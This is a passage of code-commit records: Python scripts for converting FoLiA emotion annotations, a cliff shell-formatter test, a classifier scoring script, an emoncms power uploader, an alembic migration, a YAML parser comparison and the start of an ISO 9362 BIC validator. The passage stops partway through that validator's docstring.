parser = argparse.ArgumentParser()
parser.add_argument('file', help='the name of the FoLiA XML file that '
'should be processed.')
parser.add_argument('output_dir', help='the directory where the '
'generated text files should be saved')
args = parser.parse_args()
file_name = args.file
output_dir = args.output_dir
# We are interested in labels/classes of the following three entity types:
entity_classes = [u'EmbodiedEmotions-Level1', u'EmbodiedEmotions-Level2',
u'EmbodiedEmotions-EmotionLabel']
act_tag = '{http://ilk.uvt.nl/folia}div'
# Load document
context = etree.iterparse(file_name, events=('end',), tag=act_tag)
num_sent = 0
num_emotional = 0
sents = set()
out_file = os.path.join(output_dir, '{}.txt'.format(file_name[-20:-7]))
print 'Writing file: {}'.format(out_file)
with codecs.open(out_file, 'wb', encoding='utf-8') as f:
for event, elem in context:
if elem.get('class') == 'act':
# load act into memory
act_xml = BeautifulSoup(etree.tostring(elem), 'xml')
sentences = act_xml.find_all(sentence)
s = None
for sent in sentences:
if not note(sent.parent):
sent_id = sent.attrs.get('xml:id')
for entity in sent.find_all('entity'):
e = entity.attrs.get('class')
for cl in entity_classes:
if e.startswith(cl):
entity_words = [w.attrs.get('t')
for w in entity.find_all('wref')]
ent_words = ' '.join(entity_words)
f.write(u'{}\t{}\t{}\n'.format(sent_id,
e,
ent_words))
|
<commit_before><commit_msg>Add script to generate input data for the visualization assignment
Added a script that generates input files for the visualization
assignment. The script generates text files containing all annotations
in the form:
<sentence id> <label> <tagged words><commit_after>
|
"""Create data set for visualization assignment
The data set consists of:
<sentence id>\t<label>\t<tagged words>
Usage: python folia2visualizaton.py <file in> <output dir>
Or: ./batch_do_python.sh folia2visualizaton.py <dir in> <output dir>
(for a directory containing folia files)
"""
from lxml import etree
from bs4 import BeautifulSoup
from emotools.bs4_helpers import sentence, note
import argparse
import codecs
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('file', help='the name of the FoLiA XML file that '
'should be processed.')
parser.add_argument('output_dir', help='the directory where the '
'generated text files should be saved')
args = parser.parse_args()
file_name = args.file
output_dir = args.output_dir
# We are interested in labels/classes of the following three entity types:
entity_classes = [u'EmbodiedEmotions-Level1', u'EmbodiedEmotions-Level2',
u'EmbodiedEmotions-EmotionLabel']
act_tag = '{http://ilk.uvt.nl/folia}div'
# Load document
context = etree.iterparse(file_name, events=('end',), tag=act_tag)
num_sent = 0
num_emotional = 0
sents = set()
out_file = os.path.join(output_dir, '{}.txt'.format(file_name[-20:-7]))
print 'Writing file: {}'.format(out_file)
with codecs.open(out_file, 'wb', encoding='utf-8') as f:
for event, elem in context:
if elem.get('class') == 'act':
# load act into memory
act_xml = BeautifulSoup(etree.tostring(elem), 'xml')
sentences = act_xml.find_all(sentence)
s = None
for sent in sentences:
if not note(sent.parent):
sent_id = sent.attrs.get('xml:id')
for entity in sent.find_all('entity'):
e = entity.attrs.get('class')
for cl in entity_classes:
if e.startswith(cl):
entity_words = [w.attrs.get('t')
for w in entity.find_all('wref')]
ent_words = ' '.join(entity_words)
f.write(u'{}\t{}\t{}\n'.format(sent_id,
e,
ent_words))
|
Add script to generate input data for the visualization assignment
Added a script that generates input files for the visualization
assignment. The script generates text files containing all annotations
in the form:
<sentence id> <label> <tagged words>"""Create data set for visualization assignment
The data set consists of:
<sentence id>\t<label>\t<tagged words>
Usage: python folia2visualizaton.py <file in> <output dir>
Or: ./batch_do_python.sh folia2visualizaton.py <dir in> <output dir>
(for a directory containing folia files)
"""
from lxml import etree
from bs4 import BeautifulSoup
from emotools.bs4_helpers import sentence, note
import argparse
import codecs
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('file', help='the name of the FoLiA XML file that '
'should be processed.')
parser.add_argument('output_dir', help='the directory where the '
'generated text files should be saved')
args = parser.parse_args()
file_name = args.file
output_dir = args.output_dir
# We are interested in labels/classes of the following three entity types:
entity_classes = [u'EmbodiedEmotions-Level1', u'EmbodiedEmotions-Level2',
u'EmbodiedEmotions-EmotionLabel']
act_tag = '{http://ilk.uvt.nl/folia}div'
# Load document
context = etree.iterparse(file_name, events=('end',), tag=act_tag)
num_sent = 0
num_emotional = 0
sents = set()
out_file = os.path.join(output_dir, '{}.txt'.format(file_name[-20:-7]))
print 'Writing file: {}'.format(out_file)
with codecs.open(out_file, 'wb', encoding='utf-8') as f:
for event, elem in context:
if elem.get('class') == 'act':
# load act into memory
act_xml = BeautifulSoup(etree.tostring(elem), 'xml')
sentences = act_xml.find_all(sentence)
s = None
for sent in sentences:
if not note(sent.parent):
sent_id = sent.attrs.get('xml:id')
for entity in sent.find_all('entity'):
e = entity.attrs.get('class')
for cl in entity_classes:
if e.startswith(cl):
entity_words = [w.attrs.get('t')
for w in entity.find_all('wref')]
ent_words = ' '.join(entity_words)
f.write(u'{}\t{}\t{}\n'.format(sent_id,
e,
ent_words))
|
<commit_before><commit_msg>Add script to generate input data for the visualization assignment
Added a script that generates input files for the visualization
assignment. The script generates text files containing all annotations
in the form:
<sentence id> <label> <tagged words><commit_after>"""Create data set for visualization assignment
The data set consists of:
<sentence id>\t<label>\t<tagged words>
Usage: python folia2visualizaton.py <file in> <output dir>
Or: ./batch_do_python.sh folia2visualizaton.py <dir in> <output dir>
(for a directory containing folia files)
"""
from lxml import etree
from bs4 import BeautifulSoup
from emotools.bs4_helpers import sentence, note
import argparse
import codecs
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('file', help='the name of the FoLiA XML file that '
'should be processed.')
parser.add_argument('output_dir', help='the directory where the '
'generated text files should be saved')
args = parser.parse_args()
file_name = args.file
output_dir = args.output_dir
# We are interested in labels/classes of the following three entity types:
entity_classes = [u'EmbodiedEmotions-Level1', u'EmbodiedEmotions-Level2',
u'EmbodiedEmotions-EmotionLabel']
act_tag = '{http://ilk.uvt.nl/folia}div'
# Load document
context = etree.iterparse(file_name, events=('end',), tag=act_tag)
num_sent = 0
num_emotional = 0
sents = set()
out_file = os.path.join(output_dir, '{}.txt'.format(file_name[-20:-7]))
print 'Writing file: {}'.format(out_file)
with codecs.open(out_file, 'wb', encoding='utf-8') as f:
for event, elem in context:
if elem.get('class') == 'act':
# load act into memory
act_xml = BeautifulSoup(etree.tostring(elem), 'xml')
sentences = act_xml.find_all(sentence)
s = None
for sent in sentences:
if not note(sent.parent):
sent_id = sent.attrs.get('xml:id')
for entity in sent.find_all('entity'):
e = entity.attrs.get('class')
for cl in entity_classes:
if e.startswith(cl):
entity_words = [w.attrs.get('t')
for w in entity.find_all('wref')]
ent_words = ' '.join(entity_words)
f.write(u'{}\t{}\t{}\n'.format(sent_id,
e,
ent_words))
|
|
e447666860730039eb1a3fa040f79d6b8a852fd5
|
cliff/tests/test_formatters_shell.py
|
cliff/tests/test_formatters_shell.py
|
#!/usr/bin/env python
from six import StringIO
from cliff.formatters import shell
import mock
def test_shell_formatter():
sf = shell.ShellFormatter()
c = ('a', 'b', 'c')
d = ('A', 'B', 'C')
expected = 'a="A"\nb="B"\n'
output = StringIO()
args = mock.Mock()
args.variables = ['a', 'b']
args.prefix = ''
sf.emit_one(c, d, output, args)
actual = output.getvalue()
assert expected == actual
|
Add unit test for shell formatter
|
Add unit test for shell formatter
This is in prepration for changing the behavior to escape double quotes.
Change-Id: Ib82511d066d70a1603b80ba8680b005e00113483
Related-Bug: #1269908
|
Python
|
apache-2.0
|
citrix-openstack-build/cliff,citrix-openstack-build/cliff,idjaw/cliff,idjaw/cliff,openstack/cliff,openstack/cliff,dtroyer/cliff,enzochiau/cliff,varunarya10/cliff,varunarya10/cliff,enzochiau/cliff,dtroyer/cliff
|
Add unit test for shell formatter
This is in prepration for changing the behavior to escape double quotes.
Change-Id: Ib82511d066d70a1603b80ba8680b005e00113483
Related-Bug: #1269908
|
#!/usr/bin/env python
from six import StringIO
from cliff.formatters import shell
import mock
def test_shell_formatter():
sf = shell.ShellFormatter()
c = ('a', 'b', 'c')
d = ('A', 'B', 'C')
expected = 'a="A"\nb="B"\n'
output = StringIO()
args = mock.Mock()
args.variables = ['a', 'b']
args.prefix = ''
sf.emit_one(c, d, output, args)
actual = output.getvalue()
assert expected == actual
|
<commit_before><commit_msg>Add unit test for shell formatter
This is in prepration for changing the behavior to escape double quotes.
Change-Id: Ib82511d066d70a1603b80ba8680b005e00113483
Related-Bug: #1269908<commit_after>
|
#!/usr/bin/env python
from six import StringIO
from cliff.formatters import shell
import mock
def test_shell_formatter():
sf = shell.ShellFormatter()
c = ('a', 'b', 'c')
d = ('A', 'B', 'C')
expected = 'a="A"\nb="B"\n'
output = StringIO()
args = mock.Mock()
args.variables = ['a', 'b']
args.prefix = ''
sf.emit_one(c, d, output, args)
actual = output.getvalue()
assert expected == actual
|
Add unit test for shell formatter
This is in prepration for changing the behavior to escape double quotes.
Change-Id: Ib82511d066d70a1603b80ba8680b005e00113483
Related-Bug: #1269908#!/usr/bin/env python
from six import StringIO
from cliff.formatters import shell
import mock
def test_shell_formatter():
sf = shell.ShellFormatter()
c = ('a', 'b', 'c')
d = ('A', 'B', 'C')
expected = 'a="A"\nb="B"\n'
output = StringIO()
args = mock.Mock()
args.variables = ['a', 'b']
args.prefix = ''
sf.emit_one(c, d, output, args)
actual = output.getvalue()
assert expected == actual
|
<commit_before><commit_msg>Add unit test for shell formatter
This is in prepration for changing the behavior to escape double quotes.
Change-Id: Ib82511d066d70a1603b80ba8680b005e00113483
Related-Bug: #1269908<commit_after>#!/usr/bin/env python
from six import StringIO
from cliff.formatters import shell
import mock
def test_shell_formatter():
sf = shell.ShellFormatter()
c = ('a', 'b', 'c')
d = ('A', 'B', 'C')
expected = 'a="A"\nb="B"\n'
output = StringIO()
args = mock.Mock()
args.variables = ['a', 'b']
args.prefix = ''
sf.emit_one(c, d, output, args)
actual = output.getvalue()
assert expected == actual
|
|
1d2d865cd2843924993003b579f336c48bbef127
|
score_classifiers.py
|
score_classifiers.py
|
from sklearn import svm
from sklearn.naive_bayes import GaussianNB, BernoulliNB
from sklearn.externals import joblib
import asl
threshold = int(len(asl.data) * 0.8)
training_data = asl.data[:threshold]
training_target = asl.target[:threshold]
test_data = asl.data[threshold:]
test_target = asl.target[threshold:]
classifiers = {
'SVC': svm.SVC(gamma=0.001, C=100.),
'NB': GaussianNB(),
'BNB': BernoulliNB(),
}
for name, clf in classifiers.iteritems():
print name, 'score:', clf.fit(training_data,
training_target).score(test_data, test_target)
|
Add script to score different classifiers
|
Add script to score different classifiers
|
Python
|
mit
|
ssaamm/sign-language-translator,ssaamm/sign-language-tutor,ssaamm/sign-language-translator,ssaamm/sign-language-tutor
|
Add script to score different classifiers
|
from sklearn import svm
from sklearn.naive_bayes import GaussianNB, BernoulliNB
from sklearn.externals import joblib
import asl
threshold = int(len(asl.data) * 0.8)
training_data = asl.data[:threshold]
training_target = asl.target[:threshold]
test_data = asl.data[threshold:]
test_target = asl.target[threshold:]
classifiers = {
'SVC': svm.SVC(gamma=0.001, C=100.),
'NB': GaussianNB(),
'BNB': BernoulliNB(),
}
for name, clf in classifiers.iteritems():
print name, 'score:', clf.fit(training_data,
training_target).score(test_data, test_target)
|
<commit_before><commit_msg>Add script to score different classifiers<commit_after>
|
from sklearn import svm
from sklearn.naive_bayes import GaussianNB, BernoulliNB
from sklearn.externals import joblib
import asl
threshold = int(len(asl.data) * 0.8)
training_data = asl.data[:threshold]
training_target = asl.target[:threshold]
test_data = asl.data[threshold:]
test_target = asl.target[threshold:]
classifiers = {
'SVC': svm.SVC(gamma=0.001, C=100.),
'NB': GaussianNB(),
'BNB': BernoulliNB(),
}
for name, clf in classifiers.iteritems():
print name, 'score:', clf.fit(training_data,
training_target).score(test_data, test_target)
|
Add script to score different classifiersfrom sklearn import svm
from sklearn.naive_bayes import GaussianNB, BernoulliNB
from sklearn.externals import joblib
import asl
threshold = int(len(asl.data) * 0.8)
training_data = asl.data[:threshold]
training_target = asl.target[:threshold]
test_data = asl.data[threshold:]
test_target = asl.target[threshold:]
classifiers = {
'SVC': svm.SVC(gamma=0.001, C=100.),
'NB': GaussianNB(),
'BNB': BernoulliNB(),
}
for name, clf in classifiers.iteritems():
print name, 'score:', clf.fit(training_data,
training_target).score(test_data, test_target)
|
<commit_before><commit_msg>Add script to score different classifiers<commit_after>from sklearn import svm
from sklearn.naive_bayes import GaussianNB, BernoulliNB
from sklearn.externals import joblib
import asl
threshold = int(len(asl.data) * 0.8)
training_data = asl.data[:threshold]
training_target = asl.target[:threshold]
test_data = asl.data[threshold:]
test_target = asl.target[threshold:]
classifiers = {
'SVC': svm.SVC(gamma=0.001, C=100.),
'NB': GaussianNB(),
'BNB': BernoulliNB(),
}
for name, clf in classifiers.iteritems():
print name, 'score:', clf.fit(training_data,
training_target).score(test_data, test_target)
|
|
be6194a27e3410c2393e6c4b70fb6e16d0a078b8
|
maplin2emoncms.py
|
maplin2emoncms.py
|
import serial
import struct
import datetime
import time
import urllib2
# Replace this with your emoncms Write API Key from the user account page
writeApiKey = 'WRITE API KEY GOES HERE'
# Change this if you use a different host or SSL (a must if not on a LAN)
baseAddress = 'http://localhost/emoncms'
ser = serial.Serial('/dev/ttyUSB0', 9600, timeout=1)
s2 = 'aa0200ad'
h2 = s2.decode('hex')
maxValue = 25000
while True:
try:
ser.write(h2)
data = ser.read(200)
watts = struct.unpack('<H', data[13:15])[0]
if (watts > 0 and watts < maxValue):
url = baseAddress + '/input/post.json?node=1&json={power:' + str(watts) + '}&apikey=' + writeApiKey
request = urllib2.Request(url)
response = urllib2.urlopen(request, timeout=6)
except Exception:
import traceback
print traceback.format_exc()
pass
time.sleep(7)
|
Add support for pushing data to emoncms
|
Add support for pushing data to emoncms
|
Python
|
mit
|
jpsingleton/Raspberry-Pi-Electricity-Monitor,jpsingleton/Raspberry-Pi-Electricity-Monitor
|
Add support for pushing data to emoncms
|
import serial
import struct
import datetime
import time
import urllib2
# Replace this with your emoncms Write API Key from the user account page
writeApiKey = 'WRITE API KEY GOES HERE'
# Change this if you use a different host or SSL (a must if not on a LAN)
baseAddress = 'http://localhost/emoncms'
ser = serial.Serial('/dev/ttyUSB0', 9600, timeout=1)
s2 = 'aa0200ad'
h2 = s2.decode('hex')
maxValue = 25000
while True:
try:
ser.write(h2)
data = ser.read(200)
watts = struct.unpack('<H', data[13:15])[0]
if (watts > 0 and watts < maxValue):
url = baseAddress + '/input/post.json?node=1&json={power:' + str(watts) + '}&apikey=' + writeApiKey
request = urllib2.Request(url)
response = urllib2.urlopen(request, timeout=6)
except Exception:
import traceback
print traceback.format_exc()
pass
time.sleep(7)
|
<commit_before><commit_msg>Add support for pushing data to emoncms<commit_after>
|
import serial
import struct
import datetime
import time
import urllib2
# Replace this with your emoncms Write API Key from the user account page
writeApiKey = 'WRITE API KEY GOES HERE'
# Change this if you use a different host or SSL (a must if not on a LAN)
baseAddress = 'http://localhost/emoncms'
ser = serial.Serial('/dev/ttyUSB0', 9600, timeout=1)
s2 = 'aa0200ad'
h2 = s2.decode('hex')
maxValue = 25000
while True:
try:
ser.write(h2)
data = ser.read(200)
watts = struct.unpack('<H', data[13:15])[0]
if (watts > 0 and watts < maxValue):
url = baseAddress + '/input/post.json?node=1&json={power:' + str(watts) + '}&apikey=' + writeApiKey
request = urllib2.Request(url)
response = urllib2.urlopen(request, timeout=6)
except Exception:
import traceback
print traceback.format_exc()
pass
time.sleep(7)
|
Add support for pushing data to emoncmsimport serial
import struct
import datetime
import time
import urllib2
# Replace this with your emoncms Write API Key from the user account page
writeApiKey = 'WRITE API KEY GOES HERE'
# Change this if you use a different host or SSL (a must if not on a LAN)
baseAddress = 'http://localhost/emoncms'
ser = serial.Serial('/dev/ttyUSB0', 9600, timeout=1)
s2 = 'aa0200ad'
h2 = s2.decode('hex')
maxValue = 25000
while True:
try:
ser.write(h2)
data = ser.read(200)
watts = struct.unpack('<H', data[13:15])[0]
if (watts > 0 and watts < maxValue):
url = baseAddress + '/input/post.json?node=1&json={power:' + str(watts) + '}&apikey=' + writeApiKey
request = urllib2.Request(url)
response = urllib2.urlopen(request, timeout=6)
except Exception:
import traceback
print traceback.format_exc()
pass
time.sleep(7)
|
<commit_before><commit_msg>Add support for pushing data to emoncms<commit_after>import serial
import struct
import datetime
import time
import urllib2
# Replace this with your emoncms Write API Key from the user account page
writeApiKey = 'WRITE API KEY GOES HERE'
# Change this if you use a different host or SSL (a must if not on a LAN)
baseAddress = 'http://localhost/emoncms'
ser = serial.Serial('/dev/ttyUSB0', 9600, timeout=1)
s2 = 'aa0200ad'
h2 = s2.decode('hex')
maxValue = 25000
while True:
try:
ser.write(h2)
data = ser.read(200)
watts = struct.unpack('<H', data[13:15])[0]
if (watts > 0 and watts < maxValue):
url = baseAddress + '/input/post.json?node=1&json={power:' + str(watts) + '}&apikey=' + writeApiKey
request = urllib2.Request(url)
response = urllib2.urlopen(request, timeout=6)
except Exception:
import traceback
print traceback.format_exc()
pass
time.sleep(7)
|
|
99d790a76e83185cc9c1dc000b3161e346fbebc1
|
alembic/versions/59ee93c4bf71_add_the_oneshot_column.py
|
alembic/versions/59ee93c4bf71_add_the_oneshot_column.py
|
"""Add the oneshot column.
Revision ID: 59ee93c4bf71
Revises: 3de9ad66862f
Create Date: 2015-03-20 13:38:03.081566
"""
# revision identifiers, used by Alembic.
revision = '59ee93c4bf71'
down_revision = '3de9ad66862f'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('filters', sa.Column('oneshot', sa.Boolean(), nullable=True, default=False))
def downgrade():
op.drop_column('filters', 'oneshot')
|
Add forgotten alembic upgrade script.
|
Add forgotten alembic upgrade script.
|
Python
|
lgpl-2.1
|
jeremycline/fmn,jeremycline/fmn,jeremycline/fmn
|
Add forgotten alembic upgrade script.
|
"""Add the oneshot column.
Revision ID: 59ee93c4bf71
Revises: 3de9ad66862f
Create Date: 2015-03-20 13:38:03.081566
"""
# revision identifiers, used by Alembic.
revision = '59ee93c4bf71'
down_revision = '3de9ad66862f'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('filters', sa.Column('oneshot', sa.Boolean(), nullable=True, default=False))
def downgrade():
op.drop_column('filters', 'oneshot')
|
<commit_before><commit_msg>Add forgotten alembic upgrade script.<commit_after>
|
"""Add the oneshot column.
Revision ID: 59ee93c4bf71
Revises: 3de9ad66862f
Create Date: 2015-03-20 13:38:03.081566
"""
# revision identifiers, used by Alembic.
revision = '59ee93c4bf71'
down_revision = '3de9ad66862f'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('filters', sa.Column('oneshot', sa.Boolean(), nullable=True, default=False))
def downgrade():
op.drop_column('filters', 'oneshot')
|
Add forgotten alembic upgrade script."""Add the oneshot column.
Revision ID: 59ee93c4bf71
Revises: 3de9ad66862f
Create Date: 2015-03-20 13:38:03.081566
"""
# revision identifiers, used by Alembic.
revision = '59ee93c4bf71'
down_revision = '3de9ad66862f'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('filters', sa.Column('oneshot', sa.Boolean(), nullable=True, default=False))
def downgrade():
op.drop_column('filters', 'oneshot')
|
<commit_before><commit_msg>Add forgotten alembic upgrade script.<commit_after>"""Add the oneshot column.
Revision ID: 59ee93c4bf71
Revises: 3de9ad66862f
Create Date: 2015-03-20 13:38:03.081566
"""
# revision identifiers, used by Alembic.
revision = '59ee93c4bf71'
down_revision = '3de9ad66862f'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('filters', sa.Column('oneshot', sa.Boolean(), nullable=True, default=False))
def downgrade():
op.drop_column('filters', 'oneshot')
|
|
fbb79398a9a6ddf5ffd850b2594b44066329bd98
|
python/yaml_tester.py
|
python/yaml_tester.py
|
import sys
import pprint
import time
import yaml
import ygp
try:
from yaml import CSafeLoader as SafeLoader
except:
from yaml import SafeLoader
path = sys.argv[1]
ygp_time = 0
yaml_time = 0
for path in sys.argv[1:]:
print 'checking', path
src = open(path).read()
start = time.time()
yaml_version = yaml.load(src, Loader=SafeLoader)
yaml_time += time.time() - start
start = time.time()
ygp_version = ygp.loads(src)
ygp_time += time.time() - start
assert ygp_version == yaml_version
print 'YGP:', ygp_time
print 'YAML:', yaml_time
|
Add script to validate files are yamelot compatible
|
Add script to validate files are yamelot compatible
|
Python
|
mit
|
gnprice/yamelot,gnprice/yamelot,gnprice/yamelot,gnprice/yamelot,gnprice/yamelot,gnprice/yamelot
|
Add script to validate files are yamelot compatible
|
import sys
import pprint
import time
import yaml
import ygp
try:
from yaml import CSafeLoader as SafeLoader
except:
from yaml import SafeLoader
path = sys.argv[1]
ygp_time = 0
yaml_time = 0
for path in sys.argv[1:]:
print 'checking', path
src = open(path).read()
start = time.time()
yaml_version = yaml.load(src, Loader=SafeLoader)
yaml_time += time.time() - start
start = time.time()
ygp_version = ygp.loads(src)
ygp_time += time.time() - start
assert ygp_version == yaml_version
print 'YGP:', ygp_time
print 'YAML:', yaml_time
|
<commit_before><commit_msg>Add script to validate files are yamelot compatible<commit_after>
|
import sys
import pprint
import time
import yaml
import ygp
try:
from yaml import CSafeLoader as SafeLoader
except:
from yaml import SafeLoader
path = sys.argv[1]
ygp_time = 0
yaml_time = 0
for path in sys.argv[1:]:
print 'checking', path
src = open(path).read()
start = time.time()
yaml_version = yaml.load(src, Loader=SafeLoader)
yaml_time += time.time() - start
start = time.time()
ygp_version = ygp.loads(src)
ygp_time += time.time() - start
assert ygp_version == yaml_version
print 'YGP:', ygp_time
print 'YAML:', yaml_time
|
Add script to validate files are yamelot compatibleimport sys
import pprint
import time
import yaml
import ygp
try:
from yaml import CSafeLoader as SafeLoader
except:
from yaml import SafeLoader
path = sys.argv[1]
ygp_time = 0
yaml_time = 0
for path in sys.argv[1:]:
print 'checking', path
src = open(path).read()
start = time.time()
yaml_version = yaml.load(src, Loader=SafeLoader)
yaml_time += time.time() - start
start = time.time()
ygp_version = ygp.loads(src)
ygp_time += time.time() - start
assert ygp_version == yaml_version
print 'YGP:', ygp_time
print 'YAML:', yaml_time
|
<commit_before><commit_msg>Add script to validate files are yamelot compatible<commit_after>import sys
import pprint
import time
import yaml
import ygp
try:
from yaml import CSafeLoader as SafeLoader
except:
from yaml import SafeLoader
path = sys.argv[1]
ygp_time = 0
yaml_time = 0
for path in sys.argv[1:]:
print 'checking', path
src = open(path).read()
start = time.time()
yaml_version = yaml.load(src, Loader=SafeLoader)
yaml_time += time.time() - start
start = time.time()
ygp_version = ygp.loads(src)
ygp_time += time.time() - start
assert ygp_version == yaml_version
print 'YGP:', ygp_time
print 'YAML:', yaml_time
|
|
75bcef02660da492bcbaa1bad4a15a55f64a6df9
|
stdnum/iso9362.py
|
stdnum/iso9362.py
|
# iso9362.py - functions for handling ISO 9362 Business identifier codes
#
# Copyright (C) 2015 Lifealike Ltd
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""ISO 9362 (Business identifier codes).
An ISO 9362 identifier (also: BIC, BEI, or SWIFT code) uniquely
identifies an institution. They are commonly used to route financial
transactions.
The code consists of a 4 letter institution code, a 2 letter country code,
and a 2 character location code, optionally followed by a three character
branch code.
>>> validate('AGRIFRPP882')
'AGRIFRPP882'
>>> validate('AGRIFRPP')
'AGRIFRPP'
>>> validate('AGRIFRPP8')
Traceback (most recent call last):
...
InvalidLength: ..
>>> validate('AGRIF2PP') # country code can't contain digits
Traceback (most recent call last):
...
InvalidFormat: ..
>>> format('agriFRPP') # conventionally caps
'AGRIFRPP'
"""
import re
from stdnum.exceptions import *
from stdnum.util import clean
_bic_re = re.compile(r'^[a-z]{6}[0-9a-z]{2}([0-9a-z]{3})?$', re.IGNORECASE)
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any surrounding whitespace."""
number = clean(number).strip()
return number
def validate(number):
"""Checks to see if the number provided is a valid routing number. This
checks the length and characters in each position."""
number = compact(number)
if len(number) not in (8, 11):
raise InvalidLength()
match = _bic_re.search(number)
if not match:
raise InvalidFormat()
return number
def is_valid(number):
"""Checks to see if the number provided is a valid BIC. This checks the
length and characters in each position."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number):
"""Reformat the passed number to the standard format."""
number = compact(number)
return number.upper()
|
Add ISO 9362 (BIC) support
|
Add ISO 9362 (BIC) support
|
Python
|
lgpl-2.1
|
arthurdejong/python-stdnum,holvi/python-stdnum,holvi/python-stdnum,arthurdejong/python-stdnum,holvi/python-stdnum,arthurdejong/python-stdnum,dchoruzy/python-stdnum,t0mk/python-stdnum
|
Add ISO 9362 (BIC) support
|
# iso9362.py - functions for handling ISO 9362 Business identifier codes
#
# Copyright (C) 2015 Lifealike Ltd
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""ISO 9362 (Business identifier codes).
An ISO 9362 identifier (also: BIC, BEI, or SWIFT code) uniquely
identifies an institution. They are commonly used to route financial
transactions.
The code consists of a 4 letter institution code, a 2 letter country code,
and a 2 character location code, optionally followed by a three character
branch code.
>>> validate('AGRIFRPP882')
'AGRIFRPP882'
>>> validate('AGRIFRPP')
'AGRIFRPP'
>>> validate('AGRIFRPP8')
Traceback (most recent call last):
...
InvalidLength: ..
>>> validate('AGRIF2PP') # country code can't contain digits
Traceback (most recent call last):
...
InvalidFormat: ..
>>> format('agriFRPP') # conventionally caps
'AGRIFRPP'
"""
import re
from stdnum.exceptions import *
from stdnum.util import clean
_bic_re = re.compile(r'^[a-z]{6}[0-9a-z]{2}([0-9a-z]{3})?$', re.IGNORECASE)
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any surrounding whitespace."""
number = clean(number).strip()
return number
def validate(number):
"""Checks to see if the number provided is a valid routing number. This
checks the length and characters in each position."""
number = compact(number)
if len(number) not in (8, 11):
raise InvalidLength()
match = _bic_re.search(number)
if not match:
raise InvalidFormat()
return number
def is_valid(number):
"""Checks to see if the number provided is a valid BIC. This checks the
length and characters in each position."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number):
"""Reformat the passed number to the standard format."""
number = compact(number)
return number.upper()
|
<commit_before><commit_msg>Add ISO 9362 (BIC) support<commit_after>
|
# iso9362.py - functions for handling ISO 9362 Business identifier codes
#
# Copyright (C) 2015 Lifealike Ltd
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""ISO 9362 (Business identifier codes).
An ISO 9362 identifier (also: BIC, BEI, or SWIFT code) uniquely
identifies an institution. They are commonly used to route financial
transactions.
The code consists of a 4 letter institution code, a 2 letter country code,
and a 2 character location code, optionally followed by a three character
branch code.
>>> validate('AGRIFRPP882')
'AGRIFRPP882'
>>> validate('AGRIFRPP')
'AGRIFRPP'
>>> validate('AGRIFRPP8')
Traceback (most recent call last):
...
InvalidLength: ..
>>> validate('AGRIF2PP') # country code can't contain digits
Traceback (most recent call last):
...
InvalidFormat: ..
>>> format('agriFRPP') # conventionally caps
'AGRIFRPP'
"""
import re
from stdnum.exceptions import *
from stdnum.util import clean
_bic_re = re.compile(r'^[a-z]{6}[0-9a-z]{2}([0-9a-z]{3})?$', re.IGNORECASE)
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any surrounding whitespace."""
number = clean(number).strip()
return number
def validate(number):
"""Checks to see if the number provided is a valid routing number. This
checks the length and characters in each position."""
number = compact(number)
if len(number) not in (8, 11):
raise InvalidLength()
match = _bic_re.search(number)
if not match:
raise InvalidFormat()
return number
def is_valid(number):
"""Checks to see if the number provided is a valid BIC. This checks the
length and characters in each position."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number):
"""Reformat the passed number to the standard format."""
number = compact(number)
return number.upper()
|
Add ISO 9362 (BIC) support# iso9362.py - functions for handling ISO 9362 Business identifier codes
#
# Copyright (C) 2015 Lifealike Ltd
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""ISO 9362 (Business identifier codes).
An ISO 9362 identifier (also: BIC, BEI, or SWIFT code) uniquely
identifies an institution. They are commonly used to route financial
transactions.
The code consists of a 4 letter institution code, a 2 letter country code,
and a 2 character location code, optionally followed by a three character
branch code.
